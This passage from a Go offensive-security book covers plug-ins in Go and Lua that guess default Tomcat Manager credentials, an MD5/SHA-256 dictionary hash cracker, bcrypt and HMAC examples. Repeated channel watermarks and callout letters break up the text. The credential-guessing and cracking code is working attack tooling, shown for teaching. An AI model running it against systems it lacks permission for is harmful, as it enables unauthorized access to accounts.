= true res.Details = fmt.Sprintf("Valid credentials found - %s:%s", user, password) return res } } } return res } // New is the entry point required by the scanner func New() scanner.Checker { z return new(TomcatChecker) } Listing 10-3: Creating a Tomcat credential-guessing plug-in natively (/ch-10 /plugin-tomcat/main.go) First, you need to import the scanner package we detailed previously u. This package defines both the Checker interface and the Result struct that you’ll be building. To create an implementation of Checker, you start by defining an empty struct type named TomcatChecker v. To fulfill the Checker interface’s implementation requirements, you create a method matching the required Check(host string, port uint64) *scanner.Result function signa- ture w. Within this method, you perform all of your custom vulnerability- checking logic. Since you’re expected to return a *scanner.Result, you initialize one, assigning it to a variable named res x. If the conditions are met—that is, 前沿信安资讯阵地 公众号:i nf osrc 224 Chapter 10 if the checker verifies the guessable credentials—and the vulnerability is confirmed y, you set res.Vulnerable to true and set res.Details to a message containing the identified credentials. If the vulnerability isn’t identified, the instance returned will have res.Vulnerable set to its default state—false. Lastly, you define the required exported function New() *scanner .Checker z. This adheres to the expectations set by your scanner’s Lookup() call, as well as the type assertion and conversion needed to instantiate the plug-in-defined TomcatChecker. This basic entry point does nothing more than return a new *TomcatChecker (which, since it implements the required Check() method, happens to be a scanner.Checker). Running the Scanner Now that you’ve created both your plug-in and the main program that con- sumes it, compile your plug-in, using the -o option to direct your compiled shared object to the scanner’s plug-ins directory: $ go build -buildmode=plugin -o /path/to/plugins/tomcat.so Then run your scanner (cmd/scanner/main.go) to confirm that it identi- fies the plug-in, loads it, and executes the plug-in’s Check() method: $ go run main.go Found plugin: tomcat.so 2020/01/15 15:45:18 Checking for Tomcat Manager... 2020/01/15 15:45:18 Host responded to /manager/html request 2020/01/15 15:45:18 Host requires authentication. Proceeding with password guessing... 2020/01/15 15:45:18 Host is vulnerable: Valid credentials found - tomcat:tomcat Would you look at that? It works! Your scanner is able to call code within your plug-in. You can drop any number of other plug-ins into the plug-ins directory. Your scanner will attempt to read each and kick off the vulnerability-checking functionality. The code we developed could benefit from a number of improvements. We’ll leave these improvements to you as an exercise. We encourage you to try a few things: 1. Create a plug-in to check for a different vulnerability. 2. Add the ability to dynamically supply a list of hosts and their open ports for more extensive tests. 3. Enhance the code to call only applicable plug-ins. Currently, the code will call all plug-ins for the given host and port. This isn’t ideal. For example, you wouldn’t want to call the Tomcat checker if the target port isn’t HTTP or HTTPS. 4. Convert your plug-in system to run on Windows, using DLLs as the plug-in type. In the next section, you’ll build the same vulnerability-checking plug-in in a different, unofficial plug-in system: Lua. 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 225 Building Plug-ins in Lua Using Go’s native buildmode feature when creating pluggable programs has limitations, particularly because it’s not very portable, meaning the plug-ins may not cross-compile nicely. In this section, we’ll look at a way to overcome this deficiency by creating plug-ins with Lua instead. Lua is a scripting language used to extend various tools. The language itself is easily embeddable, powerful, fast, and well-documented. Security tools such as Nmap and Wireshark use it for creating plug-ins, much as you’ll do right now. For more info, refer to the official site at https://www.lua.org/. To use Lua within Go, you’ll use a third-party package, gopher-lua, which is capable of compiling and executing Lua scripts directly in Go. Install it on your system by entering the following: $ go get github.com/yuin/gopher-lua Now, be forewarned that the price you’ll pay for portability is increased complexity. That’s because Lua has no implicit way to call functions in your program or various Go packages and has no knowledge of your data types. To solve this problem, you’ll have to choose one of two design patterns: 1. Call a single entry point in your Lua plug-in, and let the plug-in call any helper methods (such as those needed to issue HTTP requests) through other Lua packages. This makes your main program simple, but it reduces portability and could make dependency management a nightmare. For example, what if a Lua plug-in requires a third-party dependency not installed as a core Lua package? Your plug-in would break the moment you move it to another system. Also, what if two separate plug-ins require different versions of a package? 2. In your main program, wrap the helper functions (such as those from the net/http package) in a manner that exposes a façade through which the plug-in can interact. This, of course, requires you to write extensive code to expose all the Go functions and types. However, once you’ve written the code, the plug-ins can reuse it in a consistent manner. Plus, you can sort of not worry about the Lua dependency issues that you’d have if you used the first design pattern (although, of course, there’s always the chance that a plug-in author uses a third- party library and breaks something). For the remainder of this section, you’ll work on the second design pattern. You’ll wrap your Go functions to expose a façade that’s accessible to your Lua plug-ins. It’s the better of the two solutions (and plus, the word façade makes it sound like you’re building something really fancy). The bootstrapping, core Go code that loads and runs plug-ins will reside in a single file for the duration of this exercise. For the sake of sim- plicity, we’ve specifically removed some of patterns used in the examples at https://github.com/yuin/gopher-lua/. We felt that some of the patterns, such as using user-defined types, made the code less readable. In a real 前沿信安资讯阵地 公众号:i nf osrc 226 Chapter 10 implementation, you’d likely want to include some of those patterns for better flexibility. You’d also want to include more extensive error and type checking. Your main program will define functions to issue GET and HEAD HTTP requests, register those functions with the Lua virtual machine (VM), and load and execute your Lua scripts from a defined plug-ins directory. You’ll build the same Tomcat password-guessing plug-in from the previous section, so you’ll be able to compare the two versions. Creating the head() HTTP Function Let’s start with the main program. First, let’s look at the head() HTTP func- tion, which wraps calls to Go’s net/http package (Listing 10-4). func head(l *lua.LStateu) int { var ( host string port uint64 path string resp *http.Response err error url string ) v host = l.CheckString(1) port = uint64(l.CheckInt64(2)) path = l.CheckString(3) url = fmt.Sprintf("http://%s:%d/%s", host, port, path) if resp, err = http.Head(url); err != nil { w l.Push(lua.LNumber(0)) l.Push(lua.LBool(false)) l.Push(lua.LString(fmt.Sprintf("Request failed: %s", err))) x return 3 } y l.Push(lua.LNumber(resp.StatusCode)) l.Push(lua.LBool(resp.Header.Get("WWW-Authenticate") != "")) l.Push(lua.LString("")) z return 3 } Listing 10-4: Creating a head() function for Lua ( /ch-10/lua-core/cmd/scanner/main.go) First, notice that your head() function accepts a pointer to a lua.LState object and returns an int u. This is the expected signature for any func- tion you wish to register with the Lua VM. The lua.LState type maintains the running state of the VM, including any parameters passed in to Lua and returned from Go, as you’ll see shortly. Since your return values will be included within the lua.LState instance, the int return type represents the number of values returned. That way, your Lua plug-in will be able to read and use the return values. Since the lua.LState object, l, contains any parameters passed to your function, you read the data in via calls to l.CheckString() and l.CheckInt64() v. (Although not needed for our example, other Check* functions exist to accommodate other expected data types.) These functions receive an 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 227 integer value, which acts as the index for the desired parameter. Unlike Go slices, which are 0-indexed, Lua is 1-indexed. So, the call to l.CheckString(1) retrieves the first parameter supplied in the Lua function call, expecting it to be a string. You do this for each of your expected parameters, passing in the proper index of the expected value. For your head() function, you’re expecting Lua to call head(host, port, path), where host and path are strings and port is an integer. In a more resilient implementation, you’d want to do additional checking here to make sure the data supplied is valid. The function proceeds to issue an HTTP HEAD request and perform some error checking. In order to return values to your Lua callers, you push the values onto your lua.LState by calling l.Push() and passing it an object that fulfills the lua.LValue interface type w. The gopher-lua package contains several types that implement this interface, making it as easy as calling lua.LNumber(0) and lua.LBool(false), for example, to create numer- ical and boolean return types. In this example, you’re returning three values. The first is the HTTP status code, the second determines whether the server requires basic authen- tication, and the third is an error message. We’ve chosen to set the status code to 0 if an error occurs. You then return 3, which is the number of items you’ve pushed onto your LState instance x. If your call to http.Head() doesn’t produce an error, you push your return values onto LState y, this time with a valid status code, and then check for basic authentication and return 3 z. Creating the get() Function Next, you’ll create your get() function, which, like the previous example, wraps the net/http package’s functionality. In this case, however, you’ll issue an HTTP GET request. Other than that, the get() function uses fairly simi- lar constructs as your head() function by issuing an HTTP request to your target endpoint. Enter the code in Listing 10-5. func get(l *lua.LState) int { var ( host string port uint64 username string password string path string resp *http.Response err error url string client *http.Client req *http.Request ) host = l.CheckString(1) port = uint64(l.CheckInt64(2)) u username = l.CheckString(3) password = l.CheckString(4) path = l.CheckString(5) url = fmt.Sprintf("http://%s:%d/%s", host, port, path) client = new(http.Client) 前沿信安资讯阵地 公众号:i nf osrc 228 Chapter 10 if req, err = http.NewRequest("GET", url, nil); err != nil { l.Push(lua.LNumber(0)) l.Push(lua.LBool(false)) l.Push(lua.LString(fmt.Sprintf("Unable to build GET request: %s", err))) return 3 } if username != "" || password != "" { // Assume Basic Auth is required since user and/or password is set req.SetBasicAuth(username, password) } if resp, err = client.Do(req); err != nil { l.Push(lua.LNumber(0)) l.Push(lua.LBool(false)) l.Push(lua.LString(fmt.Sprintf("Unable to send GET request: %s", err))) return 3 } l.Push(lua.LNumber(resp.StatusCode)) l.Push(lua.LBool(false)) l.Push(lua.LString("")) return 3 } Listing 10-5: Creating a get() function for Lua (/ch-10 /lua-core/cmd/scanner/main.go) Much like your head() implementation, your get() function will return three values: the status code, a value expressing whether the system you’re trying to access requires basic authentication, and any error messages. The only real difference between the two functions is that your get() function accepts two additional string parameters: a username and a password u. If either of these values is set to a non-empty string, you’ll assume you have to perform basic authentication. Now, some of you are probably thinking that the implementations are oddly specific, almost to the point of negating any flexibility, reusability, and portability of a plug-in system. It’s almost as if these functions were designed for a very specific use case—that is, to check for basic authentication—rather than for a general purpose. After all, why wouldn’t you return the response body or the HTTP headers? Likewise, why wouldn’t you accept more robust parameters to set cookies, other HTTP headers, or issue POST requests with a body, for example? Simplicity is the answer. Your implementations can act as a starting point for building a more robust solution. However, creating that solution would be a more significant endeavor, and you’d likely lose the code’s purpose while trying to navigate implementation details. Instead, we’ve chosen to do things in a more basic, less flexible fashion to make the general, founda- tional concepts simpler to understand. An improved implementation would likely expose complex user-defined types that better represent the entirety of, for example, the http.Request and http.Response types. Then, rather than accepting and returning multiple parameters from Lua, you could simplify 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 229 your function signatures, reducing the number of parameters you accept and return. We encourage you to work through this challenge as an exer- cise, changing the code to accept and return user-defined structs rather than primitive types. Registering the Functions with the Lua VM Up to this point, you’ve implemented wrapper functions around the neces- sary net/http calls you intend to use, creating the functions so gopher-lua can consume them. However, you need to actually register the functions with the Lua VM. The function in Listing 10-6 centralizes this registration process. u const LuaHttpTypeName = "http" func register(l *lua.LState) { v mt := l.NewTypeMetatable(LuaHttpTypeName) w l.SetGlobal("http", mt) // static attributes x l.SetField(mt, "head", l.NewFunction(head)) l.SetField(mt, "get", l.NewFunction(get)) } Listing 10-6: Registering plug-ins with Lua (/ch-10 /lua-core/cmd/scanner/main.go) You start by defining a constant that will uniquely identify the namespace you’re creating in Lua u. In this case, you’ll use http because that’s essentially the functionality you’re exposing. In your register() function, you accept a pointer to a lua.LState, and use that namespace constant to create a new Lua type via a call to l.NewTypeMetatable() v. You’ll use this metatable to track types and functions available to Lua. You then register a global name, http, on the metatable w. This makes the http implicit package name available to the Lua VM. On the same meta- table, you also register two fields by using calls to l.SetField() x. Here, you define two static functions named head() and get(), available on the http namespace. Since they’re static, you can call them via http.get() and http .head() without having to create an instance of type http in Lua. As you may have noted in the SetField() calls, the third parameter is the destination function that’ll handle the Lua calls. In this case, those are your get() and head() functions you previously implemented. These are wrapped in a call to l.NewFunction(), which accepts a function of form func(*LState) int, which is how you defined your get() and head() functions. They return a *lua.LFunction. This might be a little overwhelming, since we’ve introduced a lot of data types and you’re probably unfamiliar with gopher-lua. Just under- stand that this function is registering the global namespace and function names and creating mappings between those function names and your Go functions. 前沿信安资讯阵地 公众号:i nf osrc 230 Chapter 10 Writing Your Main Function Lastly, you’ll need to create your main() function, which will coordinate this registration process and execute the plug-in (Listing 10-7). u const PluginsDir = "../../plugins" func main() { var ( l *lua.LState files []os.FileInfo err error f string ) v l = lua.NewState() defer l.Close() w register(l) x if files, err = ioutil.ReadDir(PluginsDir); err != nil { log.Fatalln(err) } y for idx := range files { fmt.Println("Found plugin: " + files[idx].Name()) f = fmt.Sprintf("%s/%s", PluginsDir, files[idx].Name()) z if err := l.DoFile(f); err != nil { log.Fatalln(err) } } } Listing 10-7: Registering and calling Lua plug-ins ( /ch-10/lua-core/cmd/scanner/main.go) As you did for your main() function in the Go example, you’ll hardcode the directory location from which you’ll load your plug-ins u. In your main() function, you issue a call to lua.NewState() v to create a new *lua.LState instance. The lua.NewState() instance is the key item you’ll need to set up your Lua VM, register your functions and types, and execute arbitrary Lua scripts. You then pass that pointer to the register() function you created earlier w, which registers your custom http namespace and functions on the state. You read the contents of your plug-ins directory x, looping through each file in the directory y. For each file, you call l.DoFile(f) z, where f is the absolute path to the file. This call executes the contents of the file within the Lua state on which you registered your custom types and func- tions. Basically, DoFile() is gopher-lua’s way of allowing you to execute entire files as if they were stand-alone Lua scripts. 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 231 Creating Your Plug-in Script Now let’s take a look at your Tomcat plug-in script, written in Lua (Listing 10-8). usernames = {"admin", "manager", "tomcat"} passwords = {"admin", "manager", "tomcat", "password"} status, basic, err = http.head("", 8080, "/manager/html") u if err ~= "" then print("[!] Error: "..err) return end if status ~= 401 or not basic then print("[!] Error: Endpoint does not require Basic Auth. Exiting.") return end print("[+] Endpoint requires Basic Auth. Proceeding with password guessing") for i, username in ipairs(usernames) do for j, password in ipairs(passwords) do status, basic, err = http.get("", 8080, username, password, "/manager/html") v if status == 200 then print("[+] Found creds - "..username..":"..password) return end end end Listing 10-8: A Lua plug-in for Tomcat password guessing (/ch-10 /lua-core /plugins/tomcat.lua) Don’t worry too much about the vulnerability-checking logic. It’s essen- tially the same as the logic you created in the Go version of this plug-in; it performs basic password guessing against the Tomcat Manager portal after it fingerprints the application by using a HEAD request. We’ve highlighted the two most interesting items. The first is a call to http.head("", 8080, "/manager/html") u. Based off your global and field registrations on the state metatable, you can issue a call to a function named http.head() without receiving a Lua error. Additionally, you’re supplying the call with the three parameters your head() function expected to read from the LState instance. The Lua call is expecting three return values, which align with the numbers and types you pushed onto the LState before you exited the Go function. The second item is your call to http.get() v, which is similar to the http.head() function call. The only real difference is that you are passing username and password parameters to the http.get() function. If you refer back to the Go implementation of your get() function, you’ll see that we’re reading these two additional strings from the LState instance. 前沿信安资讯阵地 公众号:i nf osrc 232 Chapter 10 Testing the Lua Plug-in This example isn’t perfect and could benefit from additional design con- siderations. But as with most adversarial tools, the most important thing is that it works and solves a problem. Running your code proves that it does, indeed, work as expected: $ go run main.go Found plugin: tomcat.lua [+] Endpoint requires Basic Auth. Proceeding with password guessing [+] Found creds - tomcat:tomcat Now that you have a basic working example, we encourage you to improve the design by implementing user-defined types so that you aren’t passing lengthy lists of arguments and parameters to and from functions. With this, you’ll likely need to explore registering instance methods on your struct, whether for setting and getting values in Lua or for calling methods on a specifically implemented instance. As you work through this, you’ll notice that your code will get significantly more complex, since you’ll be wrapping a lot of your Go functionality in a Lua-friendly manner. Summary As with many design decisions, there are multiple ways to skin a cat. Whether you’re using Go’s native plug-in system or an alternative language like Lua, you must consider trade-offs. But regardless of your approach, you can easily extend Go to make rich security frameworks, particularly since the addition of its native plug-in system. In the next chapter, you’ll tackle the rich topic of cryptography. We’ll demonstrate various implementations and use cases, and then build an RC2 symmetric-key brute-forcer. 前沿信安资讯阵地 公众号:i nf osrc 11 IM PL E M E N T ING A N D AT TACK ING CRY P T OG R A PH Y A conversation about security isn’t com- plete without exploring cryptography. When organizations use cryptographic practices, they can help conserve the integrity, confiden- tiality, and authenticity of their information and sys- tems alike. As a tool developer, you’d likely need to implement cryptographic features, perhaps for SSL/TLS communications, mutual authentication, symmetric-key cryptography, or password hashing. But developers often implement cryptographic functions insecurely, which means the offensive-minded can exploit these weaknesses to compromise sensitive, valuable data, such as social security or credit card numbers. This chapter demonstrates various implementations of cryptography in Go and discusses common weaknesses you can exploit. Although we provide introductory information for the different cryptographic functions and code blocks, we’re not attempting to explore the nuances of crypto- graphic algorithms or their mathematical foundations. That, frankly, is far beyond our interest in (or knowledge of) cryptography. As we’ve stated 前沿信安资讯阵地 公众号:i nf osrc 234 Chapter 11 before, don’t attempt anything in this chapter against resources or assets without explicit permission from the owner. We’re including these discus- sions for learning purposes, not to assist in illegal activities. Reviewing Basic Cryptography Concepts Before we explore crypto in Go, let’s discuss a few basic cryptography con- cepts. We’ll make this short to keep you from falling into a deep sleep. First, encryption (for the purposes of maintaining confidentiality) is just one of the tasks of cryptography. Encryption, generally speaking, is a two-way function with which you can scramble data and subsequently unscramble it to retrieve the initial input. The process of encrypting data renders it meaningless until it’s been decrypted. Both encryption and decryption involve passing the data and an accom- panying key into a cryptographic function. The function outputs either the encrypted data (called ciphertext) or the original, readable data (called cleartext). Various algorithms exist to do this. Symmetric algorithms use the same key during the encryption and decryption processes, whereas asymmetric algorithms use different keys for encryption and decryption. You might use encryption to protect data in transit or to store sensitive information, such as credit card numbers, to decrypt later, perhaps for convenience during a future purchase or for fraud monitoring. On the other hand, hashing is a one-way process for mathematically scrambling data. You can pass sensitive information into a hashing func- tion to produce a fixed-length output. When you’re working with strong algorithms, such as those in the SHA-2 family, the probability that different inputs produce the same output is extremely low. That is, there is a low like- lihood of a collision. Because they’re nonreversible, hashes are commonly used as an alternative to storing cleartext passwords in a database or to perform integrity checking to determine whether data has been changed. If you need to obscure or randomize the outputs for two identical inputs, you use a salt, which is a random value used to differentiate two identical inputs during the hashing process. Salts are common for password storage because they allow multiple users who coincidentally use identical pass- words to still have different hash values. Cryptography also provides a means for authenticating messages. A message authentication code (MAC) is the output produced from a special one-way cryp- tographic function. This function consumes the data itself, a secret key, and an initialization vector, and produces an output unlikely to have a collision. The sender of a message performs the function to generate a MAC and then includes the MAC as part of the message. The receiver locally calculates the MAC and compares it to the MAC they received. A match indicates that the sender has the correct secret key (that is, that the sender is authentic) and that the message was not changed (the integrity has been maintained). There! Now you should know enough about cryptography to under- stand the contents of this chapter. Where necessary, we’ll discuss more specifics relevant to the given topic. Let’s start by looking at Go’s standard crypto library. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 235 Understanding the Standard Crypto Library The beautiful thing about implementing crypto in Go is that the majority of cryptographic features you’ll likely use are part of the standard library. Whereas other languages commonly rely on OpenSSL or other third-party libraries, Go’s crypto features are part of the official repositories. This makes implementing crypto relatively straightforward, as you won’t have to install clumsy dependencies that’ll pollute your development environment. There are two separate repositories. The self-contained crypto package contains a variety of subpackages used for the most common cryptographic tasks and algorithms. For example, you could use the aes, des, and rc4 subpackages for implementing symmetric-key algorithms; the dsa and rsa subpackages for asymmetric encryption; and the md5, sha1, sha256, and sha512 subpackages for hashing. This is not an exhaus- tive list; additional subpackages exist for other crypto functions, as well. In addition to the standard crypto package, Go has an official, extended package that contains a variety of supplementary crypto functionality: golang .org/x/crypto. The functionality within includes additional hashing algorithms, encryption ciphers, and utilities. For example, the package con- tains a bcrypt subpackage for bcrypt hashing (a better, more secure alterna- tive for hashing passwords and sensitive data), acme/autocert for generating legitimate certificates, and SSH subpackages to facilitate communications over the SSH protocol. The only real difference between the built-in crypto and supplementary golang.org/x/crypto packages is that the crypto package adheres to more strin- gent compatibility requirements. Also, if you wish to use any of the golang .org/x/crypto subpackages, you’ll first need to install the package by enter- ing the following: $ go get -u golang.org/x/crypto/bcrypt For a complete listing of all the functionality and subpackages within the official Go crypto packages, check out the official documentation at https://golang.org/pkg/crypto/ and https://godoc.org/golang.org/x/crypto/. The next sections delve into various crypto implementations. You’ll see how to use Go’s crypto functionality to do some nefarious things, such as crack password hashes, decrypt sensitive data by using a static key, and brute- force weak encryption ciphers. You’ll also use the functionality to create tools that use TLS to protect your in-transit communications, check the integrity and authenticity of data, and perform mutual authentication. Exploring Hashing Hashing, as we mentioned previously, is a one-way function used to produce a fixed-length, probabilistically unique output based on a variable-length input. You can’t reverse this hash value to retrieve the original input source. Hashes are often used to store information whose original, cleartext source 前沿信安资讯阵地 公众号:i nf osrc 236 Chapter 11 won’t be needed for future processing or to track the integrity of data. For example, it’s bad practice and generally unnecessary to store the cleartext version of the password; instead, you’d store the hash (salted, ideally, to ensure randomness between duplicate values). To demonstrate hashing in Go, we’ll look at two examples. The first attempts to crack a given MD5 or SHA-512 hash by using an offline diction- ary attack. The second example demonstrates an implementation of bcrypt. As mentioned previously, bcrypt is a more secure algorithm for hashing sensitive data such as passwords. The algorithm also contains a feature that reduces its speed, making it harder to crack passwords. Cracking an MD5 or SHA-256 Hash Listing 11-1 shows the hash-cracking code. (All the code listings at the root location of / exist under the provided github repo https://github.com/ blackhat-go/bhg/.) Since hashes aren’t directly reversible, the code instead tries to guess the cleartext value of the hash by generating its own hashes of common words, taken from a word list, and then comparing the result- ing hash value with the hash you have in hand. If the two hashes match, you’ve likely guessed the cleartext value. u var md5hash = "77f62e3524cd583d698d51fa24fdff4f" var sha256hash = "95a5e1547df73abdd4781b6c9e55f3377c15d08884b11738c2727dbd887d4ced" func main() { f, err := os.Open("wordlist.txt")v if err != nil { log.Fatalln(err) } defer f.Close() w scanner := bufio.NewScanner(f) for scanner.Scan() { password := scanner.Text() hash := fmt.Sprintf("%x", md5.Sum([]byte(password))x) y if hash == md5hash { fmt.Printf("[+] Password found (MD5): %s\n", password) } hash = fmt.Sprintf("%x", sha256.Sum256([]byte(password))z) { if hash == sha256hash { fmt.Printf("[+] Password found (SHA-256): %s\n", password) } } if err := scanner.Err(); err != nil { log.Fatalln(err) } } Listing 11-1: Cracking MD5 and SHA-256 hashes (/ch-11 /hashes/main.go) 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 237 You start by defining two variables u that hold the target hash values. One is an MD5 hash, and the other is a SHA-256. Imagine that you acquired these two hashes as part of post-exploitation and you’re trying to determine the inputs (the cleartext passwords) that produced them after being run through the hashing algorithm. You can often determine the algorithm by inspecting the length of the hash itself. When you find a hash that matches the target, you’ll know you have the correct input. The list of inputs you’ll try exists in a dictionary file you’ll have created earlier. Alternatively, a Google search can help you find dictionary files for commonly used passwords. To check the MD5 hash, you open the dictionary file v and read it, line by line, by creating a bufio.Scanner on the file descrip- tor w. Each line consists of a single password value that you wish to check. You pass the current password value into a function named md5.Sum(input []byte) x. This function produces the MD5 hash value as raw bytes, so you use the fmt.Sprintf() function with the format string %x to convert it to a hexadecimal string. After all, your md5hash variable consists of a hexadeci- mal string representation of the target hash. Converting your value ensures that you can then compare the target and calculated hash values y. If these hashes match, the program displays a success message to stdout. You perform a similar process to calculate and compare SHA-256 hashes. The implementation is fairly similar to the MD5 code. The only real differ- ence is that the sha256 package contains additional functions to calculate various SHA hash lengths. Rather than calling sha256.Sum() (a function that doesn’t exist), you instead call sha256.Sum256(input []byte) z to force the hash to be calculated using the SHA-256 algorithm. Much as you did in the MD5 example, you convert your raw bytes to a hex string and compare the SHA-256 hashes to see whether you have a match {. Implementing bcrypt The next example shows how to use bcrypt to encrypt and authenticate passwords. Unlike SHA and MD5, bcrypt was designed for password hash- ing, making it a better option for application designers than the SHA or MD5 families. It includes a salt by default, as well as a cost factor that makes running the algorithm more resource-intensive. This cost factor controls the number of iterations of the internal crypto functions, increasing the time and effort needed to crack a password hash. Although the password can still be cracked using a dictionary or brute-force attack, the cost (in time) increases significantly, discouraging cracking activities during time- sensitive post-exploitation. It’s also possible to increase the cost over time to counter the advancement of computing power. This makes it adaptive to future cracking attacks. Listing 11-2 creates a bcrypt hash and then validates whether a cleartext password matches a given bcrypt hash. import ( "log" "os" 前沿信安资讯阵地 公众号:i nf osrc 238 Chapter 11 u "golang.org/x/crypto/bcrypt" ) v var storedHash = "$2a$10$Zs3ZwsjV/nF.KuvSUE.5WuwtDrK6UVXcBpQrH84V8q3Opg1yNdWLu" func main() { var password string if len(os.Args) != 2 { log.Fatalln("Usage: bcrypt password") } password = os.Args[1] w hash, err := bcrypt.GenerateFromPassword( []byte(password), bcrypt.DefaultCost, ) if err != nil { log.Fatalln(err) } log.Printf("hash = %s\n", hash) x err = bcrypt.CompareHashAndPassword([]byte(storedHash), []byte(password)) if err != nil { log.Println("[!] Authentication failed") return } log.Println("[+] Authentication successful") } Listing 11-2: Comparing bcrypt hashes (/ch-11/bcrypt /main.go) For most of the code samples in this book, we’ve omitted the package imports. We’ve included them in this example to explicitly show that you’re using the supplemental Go package, golang.org/x/crypto/bcrypt u, because Go’s built-in crypto package doesn’t contain the bcrypt functionality. You then initialize a variable, storedHash v, that holds a precomputed, encoded bcrypt hash. This is a contrived example; rather than wiring our sample code up to a database to get a value, we’ve opted to hardcode a value for demonstrative purposes. The variable could represent a value that you’ve found in a database row that stores user authentication information for a frontend web application, for instance. Next, you’ll produce a bcrypt-encoded hash from a cleartext password value. The main function reads a password value as a command line argu- ment and proceeds to call two separate bcrypt functions. The first function, bcrypt.GenerateFromPassword() w, accepts two parameters: a byte slice repre- senting the cleartext password and a cost value. In this example, you’ll pass the constant variable bcrypt.DefaultCost to use the package’s default cost, which is 10 at the time of this writing. The function returns the encoded hash value and any errors produced. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 239 The second bcrypt function you call is bcrypt.CompareHashAndPassword() x, which does the hash comparison for you behind the scenes. It accepts a bcrypt-encoded hash and a cleartext password as byte slices. The function parses the encoded hash to determine the cost and salt. It then uses these values with the cleartext password value to generate a bcrypt hash. If this resulting hash matches the hash extracted from the encoded storedHash value, you know the provided password matches what was used to create the storedHash. This is the same method you used to perform your password cracking against SHA and MD5—run a given password through the hashing func- tion and compare the result with the stored hash. Here, rather than explic- itly comparing the resulting hashes as you did for SHA and MD5, you check whether bcrypt.CompareHashAndPassword() returns an error. If you see an error, you know the computed hashes, and therefore the passwords used to com- pute them, do not match. The following are two sample program runs. The first shows the output for an incorrect password: $ go run main.go someWrongPassword 2020/08/25 08:44:01 hash = $2a$10$YSSanGl8ye/NC7GDyLBLUO5gE/ng51l9TnaB1zTChWq5g9i09v0AC 2020/08/25 08:44:01 [!] Authentication failed The second shows the output for the correct password: $ go run main.go someC0mpl3xP@ssw0rd 2020/08/25 08:39:29 hash = $2a$10$XfeUk.wKeEePNAfjQ1juXe8RaM/9EC1XZmqaJ8MoJB29hZRyuNxz. 2020/08/25 08:39:29 [+] Authentication successful Those of you with a keen eye for detail may notice that the hash value displayed for your successful authentication does not match the value you hardcoded for your storedHash variable. Recall, if you will, that your code is calling two separate functions. The GenerateFromPassword() function pro- duces the encoded hash by using a random salt value. Given different salts, the same password will produce different resulting hashes. Hence the dif- ference. The CompareHashAndPassword() function performs the hashing algo- rithm by using the same salt and cost as the stored hash, so the resulting hash is identical to the one in the storedHash variable. Authenticating Messages Let’s now turn our focus to message authentication. When exchanging messages, you need to validate both the integrity of data and the authen- ticity of the remote service to make sure that the data is authentic and hasn’t been tampered with. Was the message altered during transmission by an unauthorized source? Was the message sent by an authorized sender or was it forged by another entity? 前沿信安资讯阵地 公众号:i nf osrc 240 Chapter 11 You can address these questions by using Go’s crypto/hmac package, which implements the Keyed-Hash Message Authentication Code (HMAC) standard. HMAC is a cryptographic algorithm that allows us to check for message tam- pering and verify the identity of the source. It uses a hashing function and consumes a shared secret key, which only the parties authorized to produce valid messages or data should possess. An attacker who does not possess this shared secret cannot reasonably forge a valid HMAC value. Implementing HMAC in some programming languages can be a little tricky. For example, some languages force you to manually compare the received and calculated hash values byte by byte. Developers may inadver- tently introduce timing discrepancies in this process if their byte-by-byte comparison is aborted prematurely; an attacker can deduce the expected HMAC by measuring message-processing times. Additionally, developers will occasionally think HMACs (which consume a message and key) are the same as a hash of a secret key prepended to a message. However, the inter- nal functionality of HMACs differs from that of a pure hashing function. By not explicitly using an HMAC, the developer is exposing the applica- tion to length-extension attacks, in which an attacker forges a message and valid MAC. Luckily for us Gophers, the crypto/hmac package makes it fairly easy to implement HMAC functionality in a secure fashion. Let’s look at an implementation. Note that the following program is much simpler than a typical use case, which would likely involve some type of network com- munications and messaging. In most cases, you’d calculate the HMAC on HTTP request parameters or some other message transmitted over a network. In the example shown in Listing 11-3, we’re omitting the client- server communications and focusing solely on the HMAC functionality. var key = []byte("some random key") u func checkMAC(message, recvMAC []byte) bool { v mac := hmac.New(sha256.New, key) w mac.Write(message) calcMAC := mac.Sum(nil) return hmac.Equal(calcMAC, recvMAC)x } func main() { // In real implementations, we’d read the message and HMAC value from network source message := []byte("The red eagle flies at 10:00") y mac, _ := hex.DecodeString("69d2c7b6fbbfcaeb72a3172f4662601d1f16acfb46339639ac8c10c8da64631d") z if checkMAC(message, mac) { { fmt.Println("EQUAL") } else { fmt.Println("NOT EQUAL") } } Listing 11-3: Using HMAC for message authentication (/ch-11/hmac /main.go) 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 241 The program begins by defining the key you’ll use for your HMAC cryptographic function u. You’re hardcoding the value here, but in a real implementation, this key would be adequately protected and random. It would also be shared between the endpoints, meaning both the message sender and receiver are using this same key value. Since you aren’t imple- menting full client-server functionality here, you’ll use this variable as if it were adequately shared. Next, you define a function, checkMAC() v, that accepts a message and the received HMAC as parameters. The message receiver would call this function to check whether the MAC value they received matches the value they calculated locally. First, you call hmac.New() w, passing to it sha256.New, which is a function that returns a hash.Hash instance, and the shared secret key. In this case, the hmac.New() function initializes your HMAC by using the SHA-256 algorithm and your secret key, and assigns the result to a variable named mac. You then use this variable to calculate the HMAC hash value, as you did in the earlier hashing examples. Here, you call mac.Write(message) and mac.Sum(nil), respectively. The result is your locally calculated HMAC, stored in a variable named calcMAC. The next step is to evaluate whether your locally calculated HMAC value is equal to the HMAC value you received. To do this in a secure manner, you call hmac.Equal(calcMAC, recvMAC) x. A lot of developers would be inclined to compare the byte slices by calling bytes.Compare(calcMAC, recvMAC). The problem is, bytes.Compare() performs a lexicographical comparison, walking and comparing each element of the given slices until it finds a difference or reaches the end of a slice. The time it takes to complete this comparison will vary based on whether bytes.Compare() encounters a difference on the first element, the last, or somewhere in between. An attacker could measure this variation in time to determine the expected HMAC value and forge a request that’s processed legitimately. The hmac.Equal() function solves this problem by comparing the slices in a way that produces nearly constant measurable times. It doesn’t matter where the function finds a difference, because the processing times will vary insignificantly, producing no obvious or perceptible pattern. The main() function simulates the process of receiving a message from a client. If you were really receiving a message, you’d have to read and parse the HMAC and message values from the transmission. Since this is just a simulation, you instead hardcode the received message y and the received HMAC z, decoding the HMAC hex string so it’s represented as a []byte. You use an if statement to call your checkMAC() function {, passing 